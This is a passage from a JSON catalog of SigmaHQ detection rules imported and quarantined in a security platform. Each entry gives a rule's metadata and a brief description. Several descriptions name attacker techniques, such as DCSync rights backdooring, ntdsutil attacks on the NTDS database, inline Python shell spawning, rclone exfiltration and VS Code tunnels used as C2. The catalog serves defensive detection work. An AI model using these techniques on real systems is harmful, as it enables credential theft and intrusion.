"Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.012", "T1529" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-vm-kill-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2992ac4d-31e9-4325-99f2-b18a73221bb2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" } }, { "id": "sigmahq-sigma-29e1c216-6408-489d-8a06-ee9d151ef819", "type": "detection", "name": "Suspicious Mount-DiskImage", "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-mount-diskimage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "29e1c216-6408-489d-8a06-ee9d151ef819", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_mount_diskimage.yml" } }, { "id": "sigmahq-sigma-29f171d7-aa47-42c7-9c7b-3c87938164d9", "type": "detection", "name": "DNS Query for Anonfiles.com Domain - DNS Client", "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dns-query-for-anonfiles-com-domain-dns-client.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/dns_client/win_dns_client_anonymfiles_com.yml" } }, { "id": "sigmahq-sigma-2a072a96-a086-49fa-bcb5-15cc5a619093", "type": "detection", "name": "Start Windows Service Via Net.EXE", "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/start-windows-service-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a072a96-a086-49fa-bcb5-15cc5a619093", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_start_service.yml" } }, { "id": "sigmahq-sigma-2a0a169d-cc66-43ce-9ae2-6e678e54e46a", "type": "detection", "name": "Registry Modification Attempt Via VBScript - PowerShell", "description": "Detects attempts to modify the registry using VBScript's CreateObject(\"Wscript.shell\") and RegWrite methods embedded within PowerShell scripts or commands.\nThreat actors commonly embed VBScript code within PowerShell to perform registry modifications, attempting to evade detection that monitors for direct registry access through traditional tools.\nThis technique can be used for persistence, defense evasion, and privilege escalation by modifying registry keys without using regedit.exe, reg.exe, or PowerShell's native registry cmdlets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-modification-attempt-via-vbscript-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a0a169d-cc66-43ce-9ae2-6e678e54e46a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_vbscript_registry_modification.yml" } }, { "id": "sigmahq-sigma-2a0bb2dd-eb5f-4517-8cb9-404f8ba764a5", "type": "detection", "name": "Google Workspace Out Of Domain Email Forwarding", "description": "Detects automatic email forwarding to external domains in Google Workspace, which may indicate data leakage or misuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-out-of-domain-email-forwarding.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a0bb2dd-eb5f-4517-8cb9-404f8ba764a5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/login/gcp_gworkspace_out_of_domain_email_forwarding.yml" } }, { "id": "sigmahq-sigma-2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "type": "detection", "name": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution", "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-provisioning-registry-key-abuse-for-binary-proxy-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" } }, { "id": "sigmahq-sigma-2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "type": "detection", "name": "Azure Firewall Rule Configuration Modified or Deleted", "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-firewall-rule-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_firewall_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-2a926e6a-4b81-4011-8a96-e36cc8c04302", "type": "detection", "name": "PowerShell Scripts Installed as Services - Security", "description": "Detects powershell script installed as a Service", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-scripts-installed-as-services-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" } }, { "id": "sigmahq-sigma-2aa0a6b4-a865-495b-ab51-c28249537b75", "type": "detection", "name": "Startup Folder File Write", "description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/startup-folder-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2aa0a6b4-a865-495b-ab51-c28249537b75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" } }, { "id": "sigmahq-sigma-2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "type": "detection", "name": "Suspicious Activity in Shell Commands", "description": "Detects suspicious shell commands used in various exploit codes (see references)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-activity-in-shell-commands.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_susp_commands.yml" } }, { "id": "sigmahq-sigma-2afafd61-6aae-4df4-baed-139fa1f4c345", "type": "detection", "name": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)", "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invocation-of-active-directory-diagnostic-tool-ntdsutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2afafd61-6aae-4df4-baed-139fa1f4c345", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" } }, { "id": "sigmahq-sigma-2afe6582-e149-11ea-87d0-0242ac130003", "type": "detection", "name": "Windows Defender Malware Detection History Deletion", "description": "Windows Defender logs when the history of detected infections is deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-defender-malware-detection-history-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2afe6582-e149-11ea-87d0-0242ac130003", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_history_delete.yml" } }, { "id": "sigmahq-sigma-2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "type": "detection", "name": "System Control Panel Item Loaded From Uncommon Location", "description": "Detects image load events of system control panel items (.cpl) from uncommon or non-system locations that may indicate DLL sideloading or other abuse techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-control-panel-item-loaded-from-uncommon-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b140a5c-dc02-4bb8-b6b1-8bdb45714cde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_cpl_from_non_system_location.yml" } }, { "id": "sigmahq-sigma-2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "type": "detection", "name": "PwnDrp Access", "description": "Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1102.001", "T1102.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pwndrp-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b1ee7e4-89b6-4739-b7bb-b811b6607e5e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_pwndrop.yml" } }, { "id": "sigmahq-sigma-2b669496-d215-47d8-bd9a-f4a45bf07cda", "type": "detection", "name": "Data Exfiltration to Unsanctioned Apps", "description": "Detects when a Microsoft Cloud App Security reported when a user or IP address uses an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/data-exfiltration-to-unsanctioned-apps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b669496-d215-47d8-bd9a-f4a45bf07cda", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_data_exfiltration_to_unsanctioned_app.yml" } }, { "id": "sigmahq-sigma-2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "type": "detection", "name": "Account Lockout", "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/account-lockout.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/signin_logs/azure_account_lockout.yml" } }, { "id": "sigmahq-sigma-2bfb6216-0c31-4d20-8501-2629b29a3fa2", "type": "detection", "name": "FortiGate - New VPN SSL Web Portal Added", "description": "Detects the addition of a VPN SSL Web Portal on a Fortinet FortiGate Firewall.\nThis behavior was observed in pair with modification of VPN SSL settings.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/fortigate-new-vpn-ssl-web-portal-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2bfb6216-0c31-4d20-8501-2629b29a3fa2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/network/fortinet/fortigate/fortinet_fortigate_new_vpn_ssl_web_portal.yml" } }, { "id": "sigmahq-sigma-2c03648b-e081-41a5-b9fb-7d854a915091", "type": "detection", "name": "Rclone Activity via Proxy", "description": "Detects the use of rclone, a command-line program to manage files on cloud storage, via its default user-agent string", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rclone-activity-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c03648b-e081-41a5-b9fb-7d854a915091", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_rclone.yml" } }, { "id": "sigmahq-sigma-2c1486f5-02e8-4f86-9099-b97f2da4ed77", "type": "detection", "name": "Insecure Proxy/DOH Transfer Via Curl.EXE", "description": "Detects execution of \"curl.exe\" with the \"insecure\" flag over proxy or DOH.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/insecure-proxy-doh-transfer-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c1486f5-02e8-4f86-9099-b97f2da4ed77", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh.yml" } }, { "id": "sigmahq-sigma-2c28c248-7f50-417a-9186-a85b223010ee", "type": "detection", "name": "Wscript Shell Run In CommandLine", "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wscript-shell-run-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c28c248-7f50-417a-9186-a85b223010ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml" } }, { "id": "sigmahq-sigma-2c32b543-1058-4808-91c6-5b31b8bed6c5", "type": "detection", "name": "PUA - Crassus Execution", "description": "Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1590.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-crassus-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c32b543-1058-4808-91c6-5b31b8bed6c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_crassus.yml" } }, { "id": "sigmahq-sigma-2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "type": "detection", "name": "Driver Load From A Temporary Directory", "description": "Detects a driver load from a temporary directory", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/driver-load-from-a-temporary-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_susp_temp_use.yml" } }, { "id": "sigmahq-sigma-2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "type": "detection", "name": "Time Machine Backup Disabled Via Tmutil - MacOS", "description": "Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility \"tmutil\".\nAn attacker can use this to prevent backups from occurring.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/time-machine-backup-disabled-via-tmutil-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c95fa8a-8b8d-4787-afce-7117ceb8e3da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml" } }, { "id": "sigmahq-sigma-2c99737c-585d-4431-b61a-c911d86ff32f", "type": "detection", "name": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powerview-add-domainobjectacl-dcsync-ad-extend-right.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2c99737c-585d-4431-b61a-c911d86ff32f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_account_backdoor_dcsync_rights.yml" } }, { "id": "sigmahq-sigma-2cf29f11-e356-4f61-98c0-1bdb9393d6da", "type": "detection", "name": "Renamed Visual Studio Code Tunnel Execution", "description": "Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1219" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-visual-studio-code-tunnel-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2cf29f11-e356-4f61-98c0-1bdb9393d6da", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml" } }, { "id": "sigmahq-sigma-2d1b83e4-17c6-4896-a37b-29140b40a788", "type": "detection", "name": "Google Workspace User Granted Admin Privileges", "description": "Detects when an Google Workspace user is granted admin privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-workspace-user-granted-admin-privileges.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d1b83e4-17c6-4896-a37b-29140b40a788", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/gworkspace/admin/gcp_gworkspace_user_granted_admin_privileges.yml" } }, { "id": "sigmahq-sigma-2d22a514-e024-4428-9dba-41505bd63a5b", "type": "detection", "name": "Indirect Command Execution From Script File Via Bash.EXE", "description": "Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly.\nThis can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-from-script-file-via-bash-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d22a514-e024-4428-9dba-41505bd63a5b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bash_file_execution.yml" } }, { "id": "sigmahq-sigma-2d2f44ff-4611-4778-a8fc-323a0e9850cc", "type": "detection", "name": "Inline Python Execution - Spawn Shell Via OS System Library", "description": "Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/inline-python-execution-spawn-shell-via-os-system-library.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d2f44ff-4611-4778-a8fc-323a0e9850cc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml" } }, { "id": "sigmahq-sigma-2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "type": "detection", "name": "Suspicious Response File Execution Via Odbcconf.EXE", "description": "Detects execution of \"odbcconf\" with the \"-f\" flag in order to load a response file with a non-\".rsp\" extension.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-response-file-execution-via-odbcconf-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "2d32dd6f-3196-4093-b9eb-1ad8ab088ca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml" } }, { "id": "sigmahq-sigma-2d367498-5112-4ae5-a06a-96e7bc33a211", "type": "detection", "name": "Suspicious Binary Writes Via AnyDesk", "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": 